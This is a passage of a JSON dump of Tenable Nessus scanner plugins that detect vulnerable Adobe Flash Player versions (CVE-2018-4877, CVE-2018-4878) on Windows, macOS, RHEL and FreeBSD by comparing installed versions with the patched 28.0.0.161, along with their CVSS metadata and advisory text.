value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 28.0.0.161 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4877\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\ncutoff_version = \"28.0.0.137\";\nfix = \"28.0.0.161\";\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if (isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (isnull(ver))\n continue;\n\n # vuln <= 28.0.0.137\n if (ver_compare(ver:ver, fix:cutoff_version, strict:FALSE) <= 0)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser plugin (for Firefox / Netscape / Opera)';\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser plugin (for Google Chrome)';\n if (variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 28.0.0.161\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : '+fix+' (Chrome PepperFlash)';\n else if (!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:39:57", "description": "The version of Adobe Flash Player installed on the remote macOS or Mac OS X host is equal or prior to version 28.0.0.137. It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-05T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 28.0.0.137 Use-after-free Remote Code Execution (APSA18-01) (APSB18-03)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSA18-01.NASL", "href": "https://www.tenable.com/plugins/nessus/106607", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106607);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_bugtraq_id(102893, 102930);\n\n script_name(english:\"Adobe Flash Player for Mac <= 28.0.0.137 Use-after-free Remote Code Execution (APSA18-01) (APSB18-03)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OSX host has a browser plugin installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote macOS or Mac\nOS X host is equal or prior to version 28.0.0.137. It is,\ntherefore, affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 28.0.0.161 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4877\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\ncutoff_version = \"28.0.0.137\";\nfix = \"28.0.0.161\";\n# We're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:01", "description": "An update for flash-plugin is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.161.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to crash, execute arbitrary code, or disclose sensitive information when the victim loaded a page containing the malicious SWF content.\n(CVE-2018-4877, CVE-2018-4878)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-08T00:00:00", "type": "nessus", "title": "RHEL 6 : flash-plugin (RHSA-2018:0285) (Underminer)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-0285.NASL", "href": "https://www.tenable.com/plugins/nessus/106671", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0285. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106671);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n script_xref(name:\"RHSA\", value:\"2018:0285\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2018:0285) (Underminer)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 28.0.0.161.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed\nin the References section, could allow an attacker to create a\nspecially crafted SWF file that would cause flash-plugin to crash,\nexecute arbitrary code, or disclose sensitive information when the\nvictim loaded a page containing the malicious SWF content.\n(CVE-2018-4877, CVE-2018-4878)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4878\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0285\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-28.0.0.161-1.el6_9\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:39:43", "description": "Adobe reports :\n\n- This update resolves use-after-free vulnerabilities that could lead to remote code execution (CVE-2018-4877, CVE-2018-4878).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "nessus", "title": "FreeBSD : Flash Player -- multiple vulnerabilities (756a8631-0b84-11e8-a986-6451062f0f7a) (Underminer)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplayer", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_756A86310B8411E8A9866451062F0F7A.NASL", "href": "https://www.tenable.com/plugins/nessus/106649", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106649);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"FreeBSD : Flash Player -- multiple vulnerabilities (756a8631-0b84-11e8-a986-6451062f0f7a) (Underminer)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\n- This update resolves use-after-free vulnerabilities that could lead\nto remote code execution (CVE-2018-4877, CVE-2018-4878).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\"\n );\n # https://vuxml.freebsd.org/freebsd/756a8631-0b84-11e8-a986-6451062f0f7a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?20175c41\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplayer<28.0.0.161\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:39:44", "description": "The remote Windows host is missing security update KB4074595. It is, therefore, affected by multiple remote code execution vulnerabilities in Adobe Flash Player.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-07T00:00:00", "type": "nessus", "title": "KB4074595: Security update for Adobe Flash Player (February 2018)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS18_FEB_4074595.NASL", "href": "https://www.tenable.com/plugins/nessus/106655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106655);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n script_bugtraq_id(102893, 102930);\n script_xref(name:\"MSKB\", value:\"4074595\");\n script_xref(name:\"MSFT\", value:\"MS18-4074595\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"KB4074595: Security update for Adobe Flash Player (February 2018)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4074595. It is,\ntherefore, affected by multiple remote code execution vulnerabilities\nin Adobe Flash Player.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa18-01.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-03.html\");\n # https://support.microsoft.com/en-us/help/4074595/security-update-for-adobe-flash-player\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e60077b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4074595 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4877\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", 